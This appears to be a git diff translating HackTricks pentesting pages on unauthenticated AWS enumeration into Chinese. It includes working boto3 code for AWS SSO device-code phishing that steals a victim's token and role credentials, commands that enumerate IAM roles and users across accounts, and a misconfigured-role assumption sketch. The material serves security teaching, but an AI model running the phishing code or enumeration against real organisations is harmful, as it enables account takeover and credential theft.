For instance, if unauthorized, AWS might return: - +尝试**在没有必要权限的情况下假设角色**会触发 AWS 错误消息。例如,如果未授权,AWS 可能会返回: ```ruby An error occurred (AccessDenied) when calling the AssumeRole operation: User: arn:aws:iam::012345678901:user/MyUser is not authorized to perform: sts:AssumeRole on resource: arn:aws:iam::111111111111:role/aws-service-role/rds.amazonaws.com/AWSServiceRoleForRDS ``` - -This message confirms the role's existence but indicates that its assume role policy does not permit your assumption. In contrast, trying to **assume a non-existent role leads to a different error**: - +此消息确认角色的存在,但表明其假设角色策略不允许您进行假设。相比之下,尝试**假设一个不存在的角色会导致不同的错误**: ```less An error occurred (AccessDenied) when calling the AssumeRole operation: Not authorized to perform sts:AssumeRole ``` +有趣的是,这种**区分现有角色和不存在角色**的方法甚至适用于不同的AWS账户。只需一个有效的AWS账户ID和一个目标词汇表,就可以枚举该账户中存在的角色,而不会面临任何固有的限制。 -Interestingly, this method of **discerning between existing and non-existing roles** is applicable even across different AWS accounts. With a valid AWS account ID and a targeted wordlist, one can enumerate the roles present in the account without facing any inherent limitations. +您可以使用这个[脚本来枚举潜在的主体](https://github.com/RhinoSecurityLabs/Security-Research/tree/master/tools/aws-pentest-tools/assume_role_enum)来利用这个问题。 -You can use this [script to enumerate potential principals](https://github.com/RhinoSecurityLabs/Security-Research/tree/master/tools/aws-pentest-tools/assume_role_enum) abusing this issue. +### 信任策略:暴力破解跨账户角色和用户 -### Trust Policies: Brute-Force Cross Account roles and users - -Configuring or updating an **IAM role's trust policy involves defining which AWS resources or services are permitted to assume that role** and obtain temporary credentials. If the specified resource in the policy **exists**, the trust policy saves **successfully**. However, if the resource **does not exist**, an **error is generated**, indicating that an invalid principal was provided. +配置或更新**IAM角色的信任策略涉及定义哪些AWS资源或服务被允许假设该角色**并获取临时凭证。如果策略中指定的资源**存在**,则信任策略**成功**保存。然而,如果资源**不存在**,则会生成一个**错误**,指示提供了无效的主体。 > [!WARNING] -> Note that in that resource you could specify a cross account role or user: +> 请注意,在该资源中,您可以指定一个跨账户角色或用户: > > - `arn:aws:iam::acc_id:role/role_name` > - `arn:aws:iam::acc_id:user/user_name` -This is a policy example: - +这是一个策略示例: ```json { - "Version": "2012-10-17", - "Statement": [ - { - "Effect": "Allow", - "Principal": { - "AWS": "arn:aws:iam::216825089941:role/Test" - }, - "Action": "sts:AssumeRole" - } - ] +"Version": "2012-10-17", +"Statement": [ +{ +"Effect": "Allow", +"Principal": { +"AWS": "arn:aws:iam::216825089941:role/Test" +}, +"Action": "sts:AssumeRole" +} +] } ``` - #### GUI -That is the **error** you will find if you uses a **role that doesn't exist**. If the role **exist**, the policy will be **saved** without any errors. 
(The error is for update, but it also works when creating) +如果您使用一个**不存在的角色**,您将会发现这个**错误**。如果角色**存在**,策略将会**保存**而没有任何错误。(这个错误是针对更新的,但在创建时也适用) ![](<../../../images/image (153).png>) #### CLI - ```bash ### You could also use: aws iam update-assume-role-policy # When it works aws iam create-role --role-name Test-Role --assume-role-policy-document file://a.json { - "Role": { - "Path": "/", - "RoleName": "Test-Role", - "RoleId": "AROA5ZDCUJS3DVEIYOB73", - "Arn": "arn:aws:iam::947247140022:role/Test-Role", - "CreateDate": "2022-05-03T20:50:04Z", - "AssumeRolePolicyDocument": { - "Version": "2012-10-17", - "Statement": [ - { - "Effect": "Allow", - "Principal": { - "AWS": "arn:aws:iam::316584767888:role/account-balance" - }, - "Action": [ - "sts:AssumeRole" - ] - } - ] - } - } +"Role": { +"Path": "/", +"RoleName": "Test-Role", +"RoleId": "AROA5ZDCUJS3DVEIYOB73", +"Arn": "arn:aws:iam::947247140022:role/Test-Role", +"CreateDate": "2022-05-03T20:50:04Z", +"AssumeRolePolicyDocument": { +"Version": "2012-10-17", +"Statement": [ +{ +"Effect": "Allow", +"Principal": { +"AWS": "arn:aws:iam::316584767888:role/account-balance" +}, +"Action": [ +"sts:AssumeRole" +] +} +] +} +} } # When it doesn't work aws iam create-role --role-name Test-Role2 --assume-role-policy-document file://a.json An error occurred (MalformedPolicyDocument) when calling the CreateRole operation: Invalid principal in policy: "AWS":"arn:aws:iam::316584767888:role/account-balanceefd23f2" ``` - -You can automate this process with [https://github.com/carlospolop/aws_tools](https://github.com/carlospolop/aws_tools) +您可以使用 [https://github.com/carlospolop/aws_tools](https://github.com/carlospolop/aws_tools) 自动化此过程。 - `bash unauth_iam.sh -t user -i 316584767888 -r TestRole -w ./unauth_wordlist.txt` -Our using [Pacu](https://github.com/RhinoSecurityLabs/pacu): +我们使用 [Pacu](https://github.com/RhinoSecurityLabs/pacu): - `run iam__enum_users --role-name admin --account-id 229736458923 --word-list /tmp/names.txt` - `run iam__enum_roles --role-name admin --account-id 229736458923 --word-list /tmp/names.txt` -- The `admin` role used in the example is a **role in your account to by impersonated** by pacu to create the policies it needs to create for the enumeration +- 示例中使用的 `admin` 角色是 **您帐户中的一个角色,由 pacu 进行模拟** 以创建其需要创建的策略以进行枚举。 ### Privesc -In the case the role was bad configured an allows anyone to assume it: - +如果角色配置不当并允许任何人假设它: ```json { - "Version": "2012-10-17", - "Statement": [ - { - "Effect": "Allow", - "Principal": { - "AWS": "*" - }, - "Action": "sts:AssumeRole" - } - ] +"Version": "2012-10-17", +"Statement": [ +{ +"Effect": "Allow", +"Principal": { +"AWS": "*" +}, +"Action": "sts:AssumeRole" +} +] } ``` +攻击者可以假设它。 -The attacker could just assume it. 
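A minimal sketch of that check, run from any attacker-controlled AWS account (the role ARN and session name below are placeholders, not from the original page):

```bash
# Try to assume the role whose trust policy allows "AWS": "*" (placeholder ARN)
aws sts assume-role \
  --role-arn arn:aws:iam::123456789012:role/MisconfiguredRole \
  --role-session-name anyone-can-assume

# If temporary credentials are returned, the trust policy is exploitable as-is
export AWS_ACCESS_KEY_ID=<AccessKeyId>
export AWS_SECRET_ACCESS_KEY=<SecretAccessKey>
export AWS_SESSION_TOKEN=<SessionToken>
aws sts get-caller-identity
```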
- -## Third Party OIDC Federation - -Imagine that you manage to read a **Github Actions workflow** that is accessing a **role** inside **AWS**.\ -This trust might give access to a role with the following **trust policy**: +## 第三方 OIDC 联邦 +想象一下,你设法读取一个访问 **AWS** 内部 **角色** 的 **Github Actions 工作流**。\ +这个信任可能会给予对具有以下 **信任策略** 的角色的访问: ```json { - "Version": "2012-10-17", - "Statement": [ - { - "Effect": "Allow", - "Principal": { - "Federated": "arn:aws:iam:::oidc-provider/token.actions.githubusercontent.com" - }, - "Action": "sts:AssumeRoleWithWebIdentity", - "Condition": { - "StringEquals": { - "token.actions.githubusercontent.com:aud": "sts.amazonaws.com" - } - } - } - ] +"Version": "2012-10-17", +"Statement": [ +{ +"Effect": "Allow", +"Principal": { +"Federated": "arn:aws:iam:::oidc-provider/token.actions.githubusercontent.com" +}, +"Action": "sts:AssumeRoleWithWebIdentity", +"Condition": { +"StringEquals": { +"token.actions.githubusercontent.com:aud": "sts.amazonaws.com" +} +} +} +] } ``` +这个信任策略可能是正确的,但**缺乏更多条件**应该让你对它产生不信任。\ +这是因为之前的角色可以被**来自 Github Actions 的任何人**假设!你应该在条件中指定其他内容,例如组织名称、仓库名称、环境、分支... -This trust policy might be correct, but the **lack of more conditions** should make you distrust it.\ -This is because the previous role can be assumed by **ANYONE from Github Actions**! You should specify in the conditions also other things such as org name, repo name, env, brach... - -Another potential misconfiguration is to **add a condition** like the following: - +另一个潜在的错误配置是**添加一个条件**,如下所示: ```json "StringLike": { - "token.actions.githubusercontent.com:sub": "repo:org_name*:*" +"token.actions.githubusercontent.com:sub": "repo:org_name*:*" } ``` +注意在**冒号**(:)之前的**通配符**(*)。您可以创建一个名为**org_name1**的组织,并从Github Action中**假设角色**。 -Note that **wildcard** (\*) before the **colon** (:). You can create an org such as **org_name1** and **assume the role** from a Github Action. - -## References +## 参考文献 - [https://www.youtube.com/watch?v=8ZXRw4Ry3mQ](https://www.youtube.com/watch?v=8ZXRw4Ry3mQ) - [https://rhinosecuritylabs.com/aws/assume-worst-aws-assume-role-enumeration/](https://rhinosecuritylabs.com/aws/assume-worst-aws-assume-role-enumeration/) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.md index fd4d31de6..093e481ad 100644 --- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.md +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.md @@ -1,36 +1,33 @@ -# AWS - Identity Center & SSO Unauthenticated Enum +# AWS - Identity Center & SSO 未认证枚举 {{#include ../../../banners/hacktricks-training.md}} -## AWS Device Code Phishing +## AWS 设备代码钓鱼 -Initially proposed in [**this blog post**](https://blog.christophetd.fr/phishing-for-aws-credentials-via-aws-sso-device-code-authentication/), it's possible to send a **link** to a user using AWS SSO that if the **user accepts** the attacker will be able to get a **token to impersonate the user** and access all the roles the user is able to access in the **Identity Center**. 
+最初在 [**这篇博客文章**](https://blog.christophetd.fr/phishing-for-aws-credentials-via-aws-sso-device-code-authentication/) 中提出,可以向使用 AWS SSO 的用户发送一个 **链接**,如果 **用户接受**,攻击者将能够获取一个 **令牌以冒充用户** 并访问用户能够访问的所有角色在 **Identity Center** 中。 -In order to perform this attack the requisites are: +为了执行此攻击,前提条件是: -- The victim needs to use **Identity Center** -- The attacker must know the **subdomain** used by the victim `.awsapps.com/start` +- 受害者需要使用 **Identity Center** +- 攻击者必须知道受害者使用的 **子域名** `.awsapps.com/start` -Just with the previous info, the **attacker will be able to send a link to the user** that if **accepted** will grant the **attacker access over the AWS user** account. +仅凭上述信息,**攻击者将能够向用户发送一个链接**,如果 **接受**,将授予 **攻击者对 AWS 用户** 账户的访问权限。 -### Attack +### 攻击 -1. **Finding the subdomain** +1. **查找子域名** -The first step of the attacker is to find out the subdomain the victim company is using in their Identity Center. This can be done via **OSINT** or **guessing + BF** as most companies will be using their name or a variation of their name here. - -With this info, it's possible to get the region where the Indentity Center was configured with: +攻击者的第一步是找出受害者公司在其 Identity Center 中使用的子域名。这可以通过 **OSINT** 或 **猜测 + BF** 来完成,因为大多数公司将在这里使用其名称或其名称的变体。 +有了这些信息,就可以获取配置 Identity Center 的区域: ```bash curl https://victim.awsapps.com/start/ -s | grep -Eo '"region":"[a-z0-9\-]+"' "region":"us-east-1 ``` +2. **生成受害者的链接并发送** -2. **Generate the link for the victim & Send it** - -Run the following code to generate an AWS SSO login link so the victim can authenticate.\ -For the demo, run this code in a python console and do not exit it as later you will need some objects to get the token: - +运行以下代码以生成 AWS SSO 登录链接,以便受害者可以进行身份验证。\ +在演示中,在 Python 控制台中运行此代码,并且不要退出,因为稍后您将需要一些对象来获取令牌: ```python import boto3 @@ -39,89 +36,84 @@ AWS_SSO_START_URL = 'https://victim.awsapps.com/start' # CHANGE THIS sso_oidc = boto3.client('sso-oidc', region_name=REGION) client = sso_oidc.register_client( - clientName = 'attacker', - clientType = 'public' +clientName = 'attacker', +clientType = 'public' ) client_id = client.get('clientId') client_secret = client.get('clientSecret') authz = sso_oidc.start_device_authorization( - clientId=client_id, - clientSecret=client_secret, - startUrl=AWS_SSO_START_URL +clientId=client_id, +clientSecret=client_secret, +startUrl=AWS_SSO_START_URL ) url = authz.get('verificationUriComplete') deviceCode = authz.get('deviceCode') print("Give this URL to the victim: " + url) ``` +发送生成的链接给受害者,利用你出色的社会工程技巧! -Send the generated link to the victim using you awesome social engineering skills! +3. **等待受害者接受** -3. **Wait until the victim accepts it** - -If the victim was **already logged in AWS** he will just need to accept granting the permissions, if he wasn't, he will need to **login and then accept granting the permissions**.\ -This is how the promp looks nowadays: +如果受害者**已经登录AWS**,他只需接受授予权限;如果没有,他需要**登录然后接受授予权限**。\ +这就是现在提示的样子:
-4. **Get SSO access token** - -If the victim accepted the prompt, run this code to **generate a SSO token impersonating the user**: +4. **获取SSO访问令牌** +如果受害者接受了提示,运行此代码以**生成一个冒充用户的SSO令牌**: ```python token_response = sso_oidc.create_token( - clientId=client_id, - clientSecret=client_secret, - grantType="urn:ietf:params:oauth:grant-type:device_code", - deviceCode=deviceCode +clientId=client_id, +clientSecret=client_secret, +grantType="urn:ietf:params:oauth:grant-type:device_code", +deviceCode=deviceCode ) sso_token = token_response.get('accessToken') ``` +SSO 访问令牌是 **有效期为 8 小时**。 -The SSO access token is **valid for 8h**. - -5. **Impersonate the user** - +5. **冒充用户** ```python sso_client = boto3.client('sso', region_name=REGION) # List accounts where the user has access aws_accounts_response = sso_client.list_accounts( - accessToken=sso_token, - maxResults=100 +accessToken=sso_token, +maxResults=100 ) aws_accounts_response.get('accountList', []) # Get roles inside an account roles_response = sso_client.list_account_roles( - accessToken=sso_token, - accountId= +accessToken=sso_token, +accountId= ) roles_response.get('roleList', []) # Get credentials over a role sts_creds = sso_client.get_role_credentials( - accessToken=sso_token, - roleName=, - accountId= +accessToken=sso_token, +roleName=, +accountId= ) sts_creds.get('roleCredentials') ``` +### 针对不可钓鱼的 MFA 进行钓鱼 -### Phishing the unphisable MFA +有趣的是,之前的攻击 **即使在使用“不可钓鱼的 MFA”(webAuth)的情况下也能奏效**。这是因为之前的 **工作流程从未离开所使用的 OAuth 域**。与其他钓鱼攻击不同,用户需要替代登录域,在设备代码工作流程中,**代码由设备已知**,用户即使在不同的机器上也可以登录。如果接受了提示,设备仅通过 **知道初始代码**,就能够 **为用户检索凭据**。 -It's fun to know that the previous attack **works even if an "unphisable MFA" (webAuth) is being used**. This is because the previous **workflow never leaves the used OAuth domain**. Not like in other phishing attacks where the user needs to supplant the login domain, in the case the device code workflow is prepared so a **code is known by a device** and the user can login even in a different machine. If accepted the prompt, the device, just by **knowing the initial code**, is going to be able to **retrieve credentials** for the user. +有关更多信息,请 [**查看此帖子**](https://mjg59.dreamwidth.org/62175.html)。 -For more info about this [**check this post**](https://mjg59.dreamwidth.org/62175.html). 
- -### Automatic Tools +### 自动化工具 - [https://github.com/christophetd/aws-sso-device-code-authentication](https://github.com/christophetd/aws-sso-device-code-authentication) - [https://github.com/sebastian-mora/awsssome_phish](https://github.com/sebastian-mora/awsssome_phish) -## References +## 参考资料 - [https://blog.christophetd.fr/phishing-for-aws-credentials-via-aws-sso-device-code-authentication/](https://blog.christophetd.fr/phishing-for-aws-credentials-via-aws-sso-device-code-authentication/) - [https://ruse.tech/blogs/aws-sso-phishing](https://ruse.tech/blogs/aws-sso-phishing) @@ -129,7 +121,3 @@ For more info about this [**check this post**](https://mjg59.dreamwidth.org/6217 - [https://ramimac.me/aws-device-auth](https://ramimac.me/aws-device-auth) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iot-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iot-unauthenticated-enum.md index 38622c338..446d37850 100644 --- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iot-unauthenticated-enum.md +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iot-unauthenticated-enum.md @@ -1,17 +1,11 @@ -# AWS - IoT Unauthenticated Enum +# AWS - IoT 未认证枚举 {{#include ../../../banners/hacktricks-training.md}} -### Public URL template - +### 公共 URL 模板 ``` mqtt://{random_id}.iot.{region}.amazonaws.com:8883 https://{random_id}.iot.{region}.amazonaws.com:8443 https://{random_id}.iot.{region}.amazonaws.com:443 ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-kinesis-video-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-kinesis-video-unauthenticated-enum.md index 58b8a1309..c2bdbc577 100644 --- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-kinesis-video-unauthenticated-enum.md +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-kinesis-video-unauthenticated-enum.md @@ -2,14 +2,8 @@ {{#include ../../../banners/hacktricks-training.md}} -### Public URL template - +### 公共 URL 模板 ``` https://{random_id}.kinesisvideo.{region}.amazonaws.com ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.md index 5109a2044..f150d64a2 100644 --- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.md +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.md @@ -2,25 +2,19 @@ {{#include ../../../banners/hacktricks-training.md}} -## Public Function URL +## 公共函数 URL -It's possible to relate a **Lambda** with a **public function URL** that anyone can access. It could contain web vulnerabilities. 
- -### Public URL template +可以将 **Lambda** 与任何人都可以访问的 **公共函数 URL** 关联。它可能包含网络漏洞。 +### 公共 URL 模板 ``` https://{random_id}.lambda-url.{region}.on.aws/ ``` +### 从公共 Lambda URL 获取账户 ID -### Get Account ID from public Lambda URL +就像 S3 存储桶、数据交换和 API 网关一样,可以通过公共 Lambda URL 利用 **`aws:ResourceAccount`** **策略条件键** 找到账户的账户 ID。这是通过逐个字符查找账户 ID,利用策略中 **`aws:ResourceAccount`** 部分的通配符来实现的。\ +此技术还允许获取 **标签的值**,如果你知道标签键(有一些默认的有趣标签)。 -Just like with S3 buckets, Data Exchange and API gateways, It's possible to find the account ID of an account abusing the **`aws:ResourceAccount`** **Policy Condition Key** from a public lambda URL. This is done by finding the account ID one character at a time abusing wildcards in the **`aws:ResourceAccount`** section of the policy.\ -This technique also allows to get **values of tags** if you know the tag key (there some default interesting ones). - -You can find more information in the [**original research**](https://blog.plerion.com/conditional-love-for-aws-metadata-enumeration/) and the tool [**conditional-love**](https://github.com/plerionhq/conditional-love/) to automate this exploitation. +你可以在 [**原始研究**](https://blog.plerion.com/conditional-love-for-aws-metadata-enumeration/) 和工具 [**conditional-love**](https://github.com/plerionhq/conditional-love/) 中找到更多信息,以自动化此利用。 {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-media-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-media-unauthenticated-enum.md index 2bbc4fdd6..29942790f 100644 --- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-media-unauthenticated-enum.md +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-media-unauthenticated-enum.md @@ -1,17 +1,11 @@ -# AWS - Media Unauthenticated Enum +# AWS - 媒体未认证枚举 {{#include ../../../banners/hacktricks-training.md}} -### Public URL template - +### 公共 URL 模板 ``` https://{random_id}.mediaconvert.{region}.amazonaws.com https://{random_id}.mediapackage.{region}.amazonaws.com/in/v1/{random_id}/channel https://{random_id}.data.mediastore.{region}.amazonaws.com ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.md index ab06211e2..42a71bd59 100644 --- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.md +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.md @@ -1,26 +1,20 @@ -# AWS - MQ Unauthenticated Enum +# AWS - MQ 未认证枚举 {{#include ../../../banners/hacktricks-training.md}} -## Public Port +## 公共端口 ### **RabbitMQ** -In case of **RabbitMQ**, by **default public access** and ssl are enabled. But you need **credentials** to access (`amqps://.mq.us-east-1.amazonaws.com:5671`​​). Moreover, it's possible to **access the web management console** if you know the credentials in `https://b-.mq.us-east-1.amazonaws.com/` +在**RabbitMQ**的情况下,**默认情况下启用公共访问**和ssl。但是您需要**凭据**才能访问(`amqps://.mq.us-east-1.amazonaws.com:5671`​​)。此外,如果您知道凭据,可以**访问网络管理控制台**,网址为`https://b-.mq.us-east-1.amazonaws.com/` ### ActiveMQ -In case of **ActiveMQ**, by default public access and ssl are enabled, but you need credentials to access. 
- -### Public URL template +在**ActiveMQ**的情况下,默认情况下启用公共访问和ssl,但您需要凭据才能访问。 +### 公共URL模板 ``` https://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:8162/ ssl://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:61617 ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum.md index 9bbbd408d..12a5b241e 100644 --- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum.md +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum.md @@ -2,21 +2,15 @@ {{#include ../../../banners/hacktricks-training.md}} -### Public Port +### 公共端口 -It's possible to **expose the Kafka broker to the public**, but you will need **credentials**, IAM permissions or a valid certificate (depending on the auth method configured). +可以**将Kafka代理暴露给公众**,但您需要**凭据**、IAM权限或有效证书(具体取决于配置的认证方法)。 -It's also **possible to disabled authentication**, but in that case **it's not possible to directly expose** the port to the Internet. - -### Public URL template +也可以**禁用认证**,但在这种情况下**无法直接将端口暴露**给互联网。 +### 公共URL模板 ``` b-{1,2,3,4}.{user_provided}.{random_id}.c{1,2}.kafka.{region}.amazonaws.com {user_provided}.{random_id}.c{1,2}.kafka.useast-1.amazonaws.com ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.md index 218300e3f..24d95047a 100644 --- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.md +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.md @@ -1,23 +1,22 @@ -# AWS - RDS Unauthenticated Enum +# AWS - RDS 未认证枚举 {{#include ../../../banners/hacktricks-training.md}} ## RDS -For more information check: +有关更多信息,请查看: {{#ref}} ../aws-services/aws-relational-database-rds-enum.md {{#endref}} -## Public Port +## 公共端口 -It's possible to give public access to the **database from the internet**. The attacker will still need to **know the username and password,** IAM access, or an **exploit** to enter in the database. +可以允许**从互联网访问数据库**。攻击者仍然需要**知道用户名和密码、**IAM 访问权限或一个**漏洞**才能进入数据库。 -## Public RDS Snapshots - -AWS allows giving **access to anyone to download RDS snapshots**. 
You can list these public RDS snapshots very easily from your own account: +## 公共 RDS 快照 +AWS 允许**任何人下载 RDS 快照**。您可以很容易地从自己的账户列出这些公共 RDS 快照: ```bash # Public RDS snapshots aws rds describe-db-snapshots --include-public @@ -33,16 +32,9 @@ aws rds describe-db-snapshots --snapshot-type public [--region us-west-2] ## Even if in the console appear as there are public snapshot it might be public ## snapshots from other accounts used by the current account ``` - -### Public URL template - +### 公共 URL 模板 ``` mysql://{user_provided}.{random_id}.{region}.rds.amazonaws.com:3306 postgres://{user_provided}.{random_id}.{region}.rds.amazonaws.com:5432 ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-redshift-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-redshift-unauthenticated-enum.md index ab1577a1e..fbf15a9f0 100644 --- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-redshift-unauthenticated-enum.md +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-redshift-unauthenticated-enum.md @@ -2,14 +2,8 @@ {{#include ../../../banners/hacktricks-training.md}} -### Public URL template - +### 公共 URL 模板 ``` {user_provided}...redshift.amazonaws.com ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.md index 28c7b1673..9560dd297 100644 --- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.md +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.md @@ -1,43 +1,43 @@ -# AWS - S3 Unauthenticated Enum +# AWS - S3 未认证枚举 {{#include ../../../banners/hacktricks-training.md}} -## S3 Public Buckets +## S3 公共桶 -A bucket is considered **“public”** if **any user can list the contents** of the bucket, and **“private”** if the bucket's contents can **only be listed or written by certain users**. +如果**任何用户都可以列出**桶的内容,则该桶被视为**“公共”**,如果桶的内容**只能由某些用户列出或写入**,则被视为**“私有”**。 -Companies might have **buckets permissions miss-configured** giving access either to everything or to everyone authenticated in AWS in any account (so to anyone). Note, that even with such misconfigurations some actions might not be able to be performed as buckets might have their own access control lists (ACLs). +公司可能会有**桶权限配置错误**,导致访问权限过于宽泛,或者对任何在 AWS 中的已认证用户开放(即对任何人开放)。请注意,即使存在这样的配置错误,某些操作可能仍无法执行,因为桶可能有自己的访问控制列表(ACL)。 -**Learn about AWS-S3 misconfiguration here:** [**http://flaws.cloud**](http://flaws.cloud/) **and** [**http://flaws2.cloud/**](http://flaws2.cloud) +**在这里了解 AWS-S3 配置错误:** [**http://flaws.cloud**](http://flaws.cloud/) **和** [**http://flaws2.cloud/**](http://flaws2.cloud) -### Finding AWS Buckets +### 查找 AWS 桶 -Different methods to find when a webpage is using AWS to storage some resources: +查找网页是否使用 AWS 存储某些资源的不同方法: -#### Enumeration & OSINT: +#### 枚举与 OSINT: -- Using **wappalyzer** browser plugin -- Using burp (**spidering** the web) or by manually navigating through the page all **resources** **loaded** will be save in the History. 
-- **Check for resources** in domains like: +- 使用 **wappalyzer** 浏览器插件 +- 使用 burp(**爬虫**网页)或通过手动浏览页面,所有**加载的资源**将保存在历史记录中。 +- **检查资源**在以下域名中: - ``` - http://s3.amazonaws.com/[bucket_name]/ - http://[bucket_name].s3.amazonaws.com/ - ``` +``` +http://s3.amazonaws.com/[bucket_name]/ +http://[bucket_name].s3.amazonaws.com/ +``` -- Check for **CNAMES** as `resources.domain.com` might have the CNAME `bucket.s3.amazonaws.com` -- Check [https://buckets.grayhatwarfare.com](https://buckets.grayhatwarfare.com/), a web with already **discovered open buckets**. -- The **bucket name** and the **bucket domain name** needs to be **the same.** - - **flaws.cloud** is in **IP** 52.92.181.107 and if you go there it redirects you to [https://aws.amazon.com/s3/](https://aws.amazon.com/s3/). Also, `dig -x 52.92.181.107` gives `s3-website-us-west-2.amazonaws.com`. - - To check it's a bucket you can also **visit** [https://flaws.cloud.s3.amazonaws.com/](https://flaws.cloud.s3.amazonaws.com/). +- 检查 **CNAMES**,如 `resources.domain.com` 可能有 CNAME `bucket.s3.amazonaws.com` +- 检查 [https://buckets.grayhatwarfare.com](https://buckets.grayhatwarfare.com/),这是一个已经**发现的开放桶**的网站。 +- **桶名称**和**桶域名**需要**相同。** +- **flaws.cloud** 的 **IP** 是 52.92.181.107,如果你访问该地址,它会重定向到 [https://aws.amazon.com/s3/](https://aws.amazon.com/s3/)。此外,`dig -x 52.92.181.107` 返回 `s3-website-us-west-2.amazonaws.com`。 +- 要检查是否为桶,你也可以**访问** [https://flaws.cloud.s3.amazonaws.com/](https://flaws.cloud.s3.amazonaws.com/)。 -#### Brute-Force +#### 暴力破解 -You can find buckets by **brute-forcing name**s related to the company you are pentesting: +你可以通过**暴力破解与公司相关的名称**来查找桶: - [https://github.com/sa7mon/S3Scanner](https://github.com/sa7mon/S3Scanner) - [https://github.com/clario-tech/s3-inspector](https://github.com/clario-tech/s3-inspector) -- [https://github.com/jordanpotti/AWSBucketDump](https://github.com/jordanpotti/AWSBucketDump) (Contains a list with potential bucket names) +- [https://github.com/jordanpotti/AWSBucketDump](https://github.com/jordanpotti/AWSBucketDump)(包含潜在桶名称的列表) - [https://github.com/fellchase/flumberboozle/tree/master/flumberbuckets](https://github.com/fellchase/flumberboozle/tree/master/flumberbuckets) - [https://github.com/smaranchand/bucky](https://github.com/smaranchand/bucky) - [https://github.com/tomdev/teh_s3_bucketeers](https://github.com/tomdev/teh_s3_bucketeers) @@ -45,48 +45,47 @@ You can find buckets by **brute-forcing name**s related to the company you are p - [https://github.com/Eilonh/s3crets_scanner](https://github.com/Eilonh/s3crets_scanner) - [https://github.com/belane/CloudHunter](https://github.com/belane/CloudHunter) -
# Generate a wordlist to create permutations
+
# 生成一个单词列表以创建排列
 curl -s https://raw.githubusercontent.com/cujanovic/goaltdns/master/words.txt > /tmp/words-s3.txt.temp
 curl -s https://raw.githubusercontent.com/jordanpotti/AWSBucketDump/master/BucketNames.txt >>/tmp/words-s3.txt.temp
 cat /tmp/words-s3.txt.temp | sort -u > /tmp/words-s3.txt
 
-# Generate a wordlist based on the domains and subdomains to test
-## Write those domains and subdomains in subdomains.txt
+# 基于域名和子域名生成单词列表进行测试
+## 将这些域名和子域名写入 subdomains.txt
 cat subdomains.txt > /tmp/words-hosts-s3.txt
 cat subdomains.txt | tr "." "-" >> /tmp/words-hosts-s3.txt
 cat subdomains.txt | tr "." "\n" | sort -u >> /tmp/words-hosts-s3.txt
 
